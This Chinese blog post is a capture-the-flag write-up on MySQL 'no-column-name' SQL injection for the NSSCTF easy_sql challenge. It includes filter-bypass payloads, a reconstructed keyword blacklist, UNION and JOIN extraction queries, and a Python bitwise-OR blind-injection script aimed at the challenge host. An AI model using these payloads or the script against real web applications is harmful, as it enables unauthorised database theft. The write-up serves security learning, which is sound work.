NSS [HNCTF 2022 WEEK2]easy_sql 无列名注入详解

已于 2024-09-06 01:25:34 修改
阅读量9.5k 收藏 5
点赞数 3
分类专栏: CTF-web(零散wp合集) 文章标签: web安全 网络安全 PHP SQL注入 无列名注入 盲注
于 2023-09-17 22:37:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jayjay___/article/details/132956781
版权

NSS [HNCTF 2022 WEEK2]easy_sql

这题考察了无列名注入,首先了解一下什么是无列名注入再开始做题吧。

为什么会需要无列名注入?

我们常用的SQL注入方法是通过information_schema这个默认数据库来实现,可是你有没有想过,如果过滤了该数据库那么我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名:

  1. InnoDb引擎

    从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表(mysql.innodb_table_stats),这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。高版本的 mysql 中,还有 INNODB_TABLES 及 INNODB_COLUMNS 中记录着表结构。

  2. sys数据库

    在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns(sys.schema_auto_increment_columns)来获取表名。

但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。

无列名注入使用条件

无列名注入主要是适用于已经获取到数据表,但无法查询列的情况下,在大多数 CTF 题目中,information_schema 库被过滤,使用这种方法获取列名。

无列名注入原理

无列名注入的原理其实很简单,就是联合查询创建虚拟数据。可以看作将我们不知道的列名进行取别名操作,在取别名的同时进行数据查询,所以查询字段数一定要相同,如果我们查询的字段多于数据表中列的时候,就会出现报错。

实战演示:

正常查user表的数据是select * from user;

image-20230917145304914

用联合查询的方式来查一下表中数据select 1,2,3 union select * from user;。很明显创建了虚拟数据(虚拟字段值123和虚拟表),虚拟表中列名变成了123。

image-20230917145419828

只查一个列的字段值的话我们可以用:
解释一下,xxx就是自己命名的虚拟表的表名,可以自定义。这条sql语句在联合查询创建虚拟表xxx,虚拟列1,2,3的同时查询虚拟表第二列的数据。

select `2` from (select 1,2,3 union select * from user)xxx;

image-20230917145701326

同时查多个列

select concat(`2`,`3`) from (select 1,2,3 union select * from user)xxx;

image-20230917150452258

不过有时候 ` 也会被过滤,这时候我们就又要用到取别名(as)的操作了,把列名都换一换,那样查数据时候列名就不需要反引号了。

select 1 as a,2 as b,3 as c union select * from user;

image-20230917150229489

select b from (select 1 as a,2 as b,3 as c union select * from user)xxx;

image-20230917150304333

还有一种是利用JOIN去进行无列名注入,通过JOIN建立两个表之间的内连接,也就是说将两张表的列名给加起来,可能会爆出相同的列的名字,我们利用的就是这个特性来爆出列名。

select * from (select * from user as a join user as b)xxx;

image-20230917152950066

得到了第一个列名id,下面这个payload就会给我们回显第二列的数据。

select * from (select * from user as a join user as b using(id))xxx;

image-20230917153008543

剩下的以此类推。

select * from (select * from user as a join user as b using(id,username))xxx;

image-20230917153055650

实战sqli-labs第一关的payload:

?id=-1' union all select * from (select * from users as a join users as b)as c--+

开始做题。

image-20230917182417665

先fuzz一下。525长度都是被过滤的。

image-20230917182632166

过滤字符替换的字符
空格/**/
注释符'1 或者 ;%00
information上述无列名注入
ordergroup

黑名单应该是这样的"/and|sleep|extractvalue|information|is|not|updataxml|order|rand|handler|flag|sleep|\~|\!|\@|\#|\\$|\%|\^|\+|\&|\-|\ /i"

首先是判断回显位。

999'/**/group/**/by/**/3,'1

//也可以1'/**/union/**/select/**/1,2,3/**/'1   这样来判断

1,2,3都正常,到4回显姓名不存在,或账号密码错误,说明回显位是3。

image-20230917183702022

然后是得到所有数据库:

1'/**/union/**/select/**/1,2,group_concat(database_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1

查出数据库名得ctf,ctftraining,ctftraining,ctftraining,mysql

image-20230917185230720

然后是得到所有数据表:(表和库所属关系未知,自己一个一个试,flag表对应的库是ctftraining)

1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1

查表名得ccctttfff,flag,news,users,gtid_slave_pos

image-20230917190317695

表中的列我们得不到,所以这里拿数据(flag)就得用无列名注入。

1'/**/union/**/select/**/1,2,`1`/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)xxx/**/where/**/'1

`1`可换成group_concat(`1`)
闭合方式也有另外一种

1'union/**/select/**/1,2,group_concat(`1`)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)xxx/**/union/**/select/**/1,2,3/**/'1

image-20230917192853946

咱也可以利用位或盲注

在mysql中位或运算符为|

位或运算的实质是将参与运算的两个数据按对应的二进制数逐位进行逻辑或运算。若对应的二进制位有一个或两个为 1,则该位的运算结果为 1,否则为 0。

image-20230917200411194

脚本如下:

import requests

url='http://node5.anna.nssctf.cn:28762/index.php'
flag = ''
count = 1
while True:
    for i in range(32, 127):
        data = {
            # "id": f"1'|if(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())),{count},1))={i},1,2)||'"
            # "id": f"1'|if(ascii(substr((select/**/database_name/**/from/**/mysql.innodb_table_stats/**/group/**/by/**/database_name/**/LIMIT/**/0,1),{count},1))={i},1,2)||'"
            # "id": f"1'|if(ascii(substr((select/**/group_concat(database_name)from/**/mysql.innodb_table_stats),{count},1))={i},1,2)||'"

            # "id": f"1'|if(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)),{count},1))={i},1,2)||'"

            "id": f"1'|if(ascii(substr((select(group_concat(`1`))from(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)xxx),{count},1))={i},1,2)||'"
        }
        resp = requests.post(url=url, data=data)
        #print(resp.text)
        if 'Here is your want!' in resp.text:
            flag += chr(i)
            print(flag)
            break
        elif i == 126:
            exit()
        #time.sleep(0.1)
    count += 1

image-20230917200619743

看别的师傅的思路,还有一种闭合方式是%00截断。

比如id=1';%00

在脚本中可以这样写:f"1' union select 1,2,3;{parse.unquote('%00')}"

image-20230917204300943

Jay 17
关注
专栏目录
[SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 959
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
NSS_PPT_chap02_V1.3.ppt
04-13
- **Web服务**:常见的威胁包括SQL注入、XSS攻击、CSRF攻击等。 - **数据库**:面临的数据泄露、权限滥用等风险。 ### 二、网络攻击的常见手法 - **端口扫描**:攻击者通过扫描目标主机开放的端口来获取有用的信息...
NSSCTF】easy-sql
2301_80115024的博客
04-21 397
(之前做过类似题,就扒拉了一下题库,又找到了这一题练练手)先查看回显参数 /?wllm=1 如图判断字段数 /?wllm=-1' order by 3--+ /?wllm=-1' order by 4--+查询4时出现如图情况,因此有3个显示位查回显 /?wllm=-1' union select 1,2,3--+查表名 /?wllm=-1' union select 1,2,group_concat(table_name) f
[HNCTF 2022 WEEK2]easy_include
biejianghua的博客
03-02 1404
[HNCTF 2022 WEEK2]easy_include
Easy SQL快速入门及实战指南
最新发布
gitblog_00470的博客
08-28 422
Easy SQL快速入门及实战指南 easy_sqlA library developed to ease the data ETL development process.项目地址:https://gitcode.com/gh_mirrors/ea/easy_sql 项目介绍 Easy SQL 是一个专为简化数据ETL(抽取、转换、加载)开发流程设计的库。它允许开发者以命令式的方式撰写SQL脚...
[HNCTF 2022 WEEK2]easy_unser
weixin_62306641的博客
11-23 604
因为有个私有变量,所以要url编码,有个_wakeup(),改一下数目。打开发现源码,是反序列化,Url编码之后再改。
列名&位或注入随记
Aiwin的博客
02-07 1054
列名&位或注入随记
CTF笔记 个人HNCTF反思(部分题目)
qq_51248658的博客
10-31 2324
[WEEK2]easy_include、[WEEK2]easy_unser、[WEEK2]easy_sql、[WEEK2]ez_SSTI、[WEEK4]pop子和pipi美
NSSCTF第14页(3)
wwwwyyyrre的博客
12-07 135
题目提示说是无列名注入先进行fuzz测试过滤了很多东西information_schema 被过滤 -> 无列名注入order 被过滤 -> group 替换空格 -> /**/注释符 -> '1;%00判断回显位查数据库查表拿flag用无列名注入也可以用位或注入flag = ''count = 1data = {breakexit()count += 1。
NSS.zip_NSS模型_finallyqk3_nss利率_nss模型程序_利率期限结构
09-21
【标题】"NSS.zip"中的内容主要围绕NSS模型展开,这是一种用于分析和预测利率期限结构的工具。"finallyqk3"可能是指该模型的一个特定版本或者是由用户"finallyqk3"编写的实现。"nss利率"指的是模型与利率相关的核心...
NSS.rar_nss 内核_哈希表
09-19
标题中的“NSS.rar_nss 内核_哈希表”指的是一个与Linux内核相关的资源压缩包,其中包含了用于内核开发的重要组件,特别是哈希表的实现。哈希表是一种高效的数据结构,广泛应用于各种系统,包括操作系统内核,用于...
week2day2
02-18
week2day2
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
NSS_PPT_CHAP07_V1.5.ppt
04-13
NSS_PPT_CHAP07_V1.5
easy_sql
qq_73861475的博客
09-06 389
3、判断数据回显位置 -1 union select 1,2,3,4,5.... //参数等号后面加-表示不显示当前数据。特殊符号注释:通过使用特殊符号来实现注释,例如在MySQL中,可以使用"#"符号来注释掉后面的内容。分段注释:可以通过在SQL语句中间添加注释符号来隐藏攻击代码,例如使用")--"或")/*"。尝试联合查询注入,1' union select 1,2#,发现被过滤了。多行注释:使用"/* */"符号,其中的内容将被注释掉。1、判断有无闭合 ,1,1‘,1’#
easy_sql解析
qq_73722777的博客
03-08 470
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
攻防世界web新手 - very_easy_sql(非常详细的wp)
yuanxu8877的博客
11-27 8560
攻防世界web新手 - very_easy_sql(非常详细的wp),希望大家不要吝啬您的点赞收藏哦。
刷题日记 date 6.9
m0_64348326的博客
06-12 161
但是由于上面可以看见$user=((string)的转换函数还在,所以需要先添加内容后再闭合,否则页面将报错,包括后面的html代码通通需要注释,最后大概变成下面这种形式。毫无疑问是任意文件读取,先读取index.php,多余的前端代码以删除。访问得到flag,这里很坑的一点是,因为CRLF的原因,在最后需要套两次。1.注册登陆后是个沙盒界面,桌面上有个好康的,抓包点击发现。而该变量是通过我们注册时输入的值所可控的,然后和读取到的。函数写shell,文件名知道,主要是文件内容,所以得分析。
[HNCTF 2022 WEEK2]Canyource
m0_70819573的博客
04-08 685
也就是说,题目要求payload格式为()的嵌套,因为他会递归匹配,判断[...]()替换为空后的结果是否等于;2.这道题的过滤并不严格,导致了payload的多样性,在解题之前,需要了解以下函数。3.在做题之前,再讲讲题目中的正则表达式。1.打开环境,发现就是无参rce的题型。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jay 17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值